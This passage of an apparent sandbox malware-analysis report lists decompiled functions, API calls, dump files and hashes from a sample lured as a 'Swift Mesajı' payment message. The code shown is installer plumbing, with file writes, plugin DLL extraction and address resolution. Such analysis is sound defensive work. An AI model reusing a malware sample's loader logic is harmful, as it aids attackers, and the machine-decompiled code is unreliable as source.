				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B4))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}

0x100024ae
0x100024b0
0x100024bf
0x100024c5
0x100024d2
0x100024d4
0x100024d8
0x100024d8
0x100024e0
0x100024e6
0x100024e8
0x00000000
0x100024ef
0x00000000
0x00000000
0x100024f5
0x00000000
0x00000000
0x100024ff
0x00000000
0x00000000
0x10002506
0x1000250c
0x10002518
0x1000251e
0x10002523
0x00000000
0x00000000
0x10002545
0x00000000
0x00000000
0x1000252b
0x10002531
0x10002532
0x10002534
0x00000000
0x00000000
0x1000254d
0x1000254f
0x10002551
0x10002553
0x10002553
0x00000000
0x00000000
0x100024e8
0x10002556
0x10002556
0x1000255b
0x1000256d
0x1000256d
0x10002573
0x10002578
0x1000257d
0x10002589
0x1000258e
0x00000000
0x10002593
0x1000257f
0x10002580
0x10002594
0x10002594
0x1000257d
0x10002595
0x10002599
0x1000259c
0x100025b3

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 1000256D
GlobalFree.KERNEL32(00000000), ref: 100025A8

Memory Dump Source

Source File: 00000001.00000002.7936337323.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.7936306097.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936376155.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936411270.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004028A7(int __ebx) {
				void* _t26;
				long _t31;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
				_t50 = E00402C37(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E00405BCA(_t50) == 0) {
					E00402C37(0xffffffed);
				}
				E00405D4F(_t50);
				_t26 = E00405D74(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x434ef8;
					 *(_t56 - 0x3c) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E0040332B(_t45);
						E00403315(_t49,  *(_t56 - 0x3c));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x4c) = _t54;
						if(_t54 != _t45) {
							E004030FA( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x34) =  *_t54;
								E00405D2F( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x34);
							}
							GlobalFree( *(_t56 - 0x4c));
						}
						E00405E26( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0x30)) = E004030FA(0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004028a7
0x004028a9
0x004028b5
0x004028b8
0x004028c2
0x004028c6
0x004028c6
0x004028cc
0x004028d9
0x004028e1
0x004028e4
0x004028ea
0x004028f8
0x004028fd
0x00402901
0x00402904
0x0040290d
0x00402919
0x0040291d
0x00402920
0x0040292a
0x00402949
0x00402931
0x00402936
0x0040293e
0x00402941
0x00402946
0x00402946
0x00402950
0x00402950
0x0040295d
0x00402963
0x00402975
0x00402975
0x0040297b
0x0040297b
0x00402986
0x00402987
0x0040298b
0x0040298f
0x00402995
0x00402995
0x0040299c
0x00402245
0x00402ac2
0x00402ace

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
GlobalFree.KERNEL32(?), ref: 00402950
GlobalFree.KERNEL32(00000000), ref: 00402963
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
Instruction ID: c7dec26b55dd312fec5fb3faf1598927ec34475db9096b9e5e75d52a628400f5
Opcode Fuzzy Hash: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
Instruction Fuzzy Hash: E521BDB1C00128BBDF216FA5DE49D9E7E79EF08364F10423AF964762E0CB794C418B98

Uniqueness

Uniqueness Score: -1.00%

Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00402592(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t14;
				int _t17;
				int _t24;
				signed int _t29;
				intOrPtr* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				signed int _t40;

				_t32 = __esi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x20);
				_t38 = __edx - 0x38;
				 *(_t35 - 0x4c) = _t14;
				_t27 = 0 | _t38 == 0x00000000;
				_t29 = _t38 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402C37(0x11)) + _t16;
					} else {
						E00402C37(0x21);
						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nsjFA0C.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nsjFA0C.tmp\System.dll", 0x400, __ebx, __ebx);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsjFA0C.tmp\System.dll");
					}
				} else {
					E00402C15(1);
					 *0x40add0 = __ax;
					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t32 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t34 = E004061E2(_t27, _t32);
					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405E55(_t34, _t34) >= 0) {
						_t14 = E00405E26(_t34, "C:\Users\Arthur\AppData\Local\Temp\nsjFA0C.tmp\System.dll",  *(_t35 + 8));
						_t40 = _t14;
						if(_t40 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00402592
0x00402592
0x00402592
0x00402597
0x0040259a
0x0040259d
0x004025a2
0x004025a4
0x004025c4
0x00402602
0x004025c6
0x004025c8
0x004025e2
0x004025ed
0x004025ed
0x004025a6
0x004025a8
0x004025ad
0x004025bb
0x004025be
0x00402607
0x0040260a
0x00402885
0x00402885
0x00402610
0x00402619
0x0040261b
0x0040263a
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x0040261b
0x00402ac2
0x00402ace

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED

Strings

C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp\System.dll, xrefs: 004025AD, 004025D4, 004025E8, 00402634
C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp, xrefs: 004025DB

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp$C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp\System.dll
API String ID: 3109718747-4275203361
Opcode ID: 29697b63a1bf179c8a70b2ea45890600dc215057ee6868cc9ec1e4f57a159bbe
Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
Opcode Fuzzy Hash: 29697b63a1bf179c8a70b2ea45890600dc215057ee6868cc9ec1e4f57a159bbe
Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E

Uniqueness

Uniqueness Score: -1.00%

Function 100022D0 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E100022D0(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed int* _t42;
				signed int* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t41;
							goto L12;
						} else {
							_t37 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E10001243();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t42 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t38 =  *_t51;
						_t51[7] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M10002447))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E1000122C(0x10004044);
					goto L10;
				}
			}

0x100022e4
0x100022e8
0x100022f3
0x100022f3
0x100022fa
0x100022ff
0x00000000
0x00000000
0x10002303
0x10002306
0x00000000
0x00000000
0x1000230b
0x10002316
0x10002326
0x00000000
0x1000231d
0x1000231f
0x10002335
0x00000000
0x10002335
0x1000230d
0x1000230d
0x10002336
0x10002336
0x10002338
0x1000233c
0x1000233c
0x1000233f
0x1000233f
0x10002347
0x1000234e
0x10002351
0x10002410
0x10002411
0x1000241c
0x10002446
0x10002446
0x1000242c
0x10002438
0x1000242e
0x1000242e
0x1000242e
0x00000000
0x10002357
0x10002357
0x00000000
0x1000235e
0x00000000
0x00000000
0x10002366
0x00000000
0x00000000
0x10002374
0x10002376
0x00000000
0x00000000
0x10002397
0x1000239d
0x100023a0
0x100023a2
0x100023b2
0x00000000
0x00000000
0x1000237f
0x10002384
0x10002387
0x10002388
0x00000000
0x00000000
0x100023be
0x100023c4
0x100023c5
0x100023c8
0x100023c9
0x100023cb
0x00000000
0x00000000
0x100023d7
0x100023da
0x100023e6
0x100023e8
0x00000000
0x00000000
0x100023f4
0x10002400
0x10002403
0x10002405
0x10002408
0x00000000
0x00000000
0x10002357
0x10002351
0x1000232b
0x10002330
0x00000000
0x10002330

APIs

GlobalFree.KERNEL32(00000000), ref: 10002411

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000001.00000002.7936337323.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.7936306097.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936376155.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936411270.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65

Uniqueness

Uniqueness Score: -1.00%

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x10001619
0x10001625
0x10001632
0x10001639
0x10001642
0x1000164e

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000001.00000002.7936337323.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.7936306097.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936376155.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936411270.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D57() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
				GetClientRect(_t25, _t27 - 0x58);
				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C37(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d63
0x00401d6a
0x00401d99
0x00401da1
0x00401da8
0x00401da8
0x00402ac2
0x00402ace

APIs

GetDlgItem.USER32(?,?), ref: 00401D5D
GetClientRect.USER32(00000000,?), ref: 00401D6A
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
DeleteObject.GDI32(00000000), ref: 00401DA8

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: c7f94385dd4a6174af72edd052602ed5a5951d747682783072fd515e99349627
Instruction ID: face61d34558c4de7c2b3a6e9a6cb1e1a296a7661f17e088ac2b3614559d71e0
Opcode Fuzzy Hash: c7f94385dd4a6174af72edd052602ed5a5951d747682783072fd515e99349627
Instruction Fuzzy Hash: 2DF0FF72604518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F6191CA749D019B78

Uniqueness

Uniqueness Score: -1.00%

Function 00404AA2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404AA2(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004062A4(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004062A4(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004062A4(_t44, _t50, 0x42d248, 0x42d248, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d248) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433eb8, _a4, 0x42d248);
			}

0x00404aab
0x00404ab0
0x00404ab8
0x00404ab9
0x00404ac6
0x00404ace
0x00404acf
0x00404ad1
0x00404ad3
0x00404ad5
0x00404ad8
0x00404ad8
0x00404adf
0x00404ae5
0x00404ae5
0x00404aec
0x00404af3
0x00404af6
0x00404af9
0x00404af9
0x00404afd
0x00404b0d
0x00404b0f
0x00404b12
0x00404abb
0x00404abb
0x00404ac2
0x00404ac2
0x00404b1a
0x00404b25
0x00404b3b
0x00404b4c
0x00404b68

APIs

lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
wsprintfW.USER32 ref: 00404B4C
SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F

Strings

%u.%u%s%s, xrefs: 00404B2D

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
